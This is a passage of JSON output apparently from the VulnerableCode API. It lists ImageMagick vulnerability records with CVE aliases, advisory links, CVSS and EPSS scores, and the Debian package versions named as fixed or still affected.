"VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13306" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pj8s-qad1-6qdu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49504?format=api", "vulnerability_id": "VCID-pjm4-2g47-4qau", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-1906.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-1906.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-1906", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10583", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.1061", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10674", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10536", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10609", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10668", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10682", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10651", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10626", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10491", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10509", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10634", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-1906" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034373", "reference_id": "1034373", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034373" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2185714", "reference_id": "2185714", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:36:35Z/" } ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2185714" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6655G3GPS42WQM32DJHUCZALI2URQSCO/", "reference_id": "6655G3GPS42WQM32DJHUCZALI2URQSCO", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:36:35Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6655G3GPS42WQM32DJHUCZALI2URQSCO/" }, { "reference_url": "https://access.redhat.com/security/cve/CVE-2023-1906", "reference_id": "CVE-2023-1906", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:36:35Z/" } ], "url": "https://access.redhat.com/security/cve/CVE-2023-1906" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/d7a8bdd7bb33cf8e58bc01b4a4f2ea5466f8c6b3", "reference_id": "d7a8bdd7bb33cf8e58bc01b4a4f2ea5466f8c6b3", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:36:35Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d7a8bdd7bb33cf8e58bc01b4a4f2ea5466f8c6b3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick6/commit/e30c693b37c3b41723f1469d1226a2c814ca443d", "reference_id": "e30c693b37c3b41723f1469d1226a2c814ca443d", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:36:35Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/e30c693b37c3b41723f1469d1226a2c814ca443d" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-35q2-86c7-9247", "reference_id": "GHSA-35q2-86c7-9247", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:36:35Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-35q2-86c7-9247" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2023-1906" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pjm4-2g47-4qau" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49508?format=api", "vulnerability_id": "VCID-pk4j-w1q9-vqd2", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-34151.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-34151.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34151", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21194", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21249", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.2097", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.2105", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21111", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21121", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21078", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21026", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21016", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21027", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21005", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.20878", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34151" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1036999", "reference_id": "1036999", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1036999" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210657", "reference_id": "2210657", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210657" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-2/", "reference_id": "USN-6200-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-2/" }, { "reference_url": "https://usn.ubuntu.com/7440-1/", "reference_id": "USN-7440-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7440-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2023-34151" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pk4j-w1q9-vqd2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80884?format=api", "vulnerability_id": "VCID-pmpn-drv8-9ude", "summary": "ImageMagick: NULL pointer dereference in ReadSVGImage() in coders/svg.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3596.json", "reference_id": "", "reference_type": "", "scores": [ { "value": 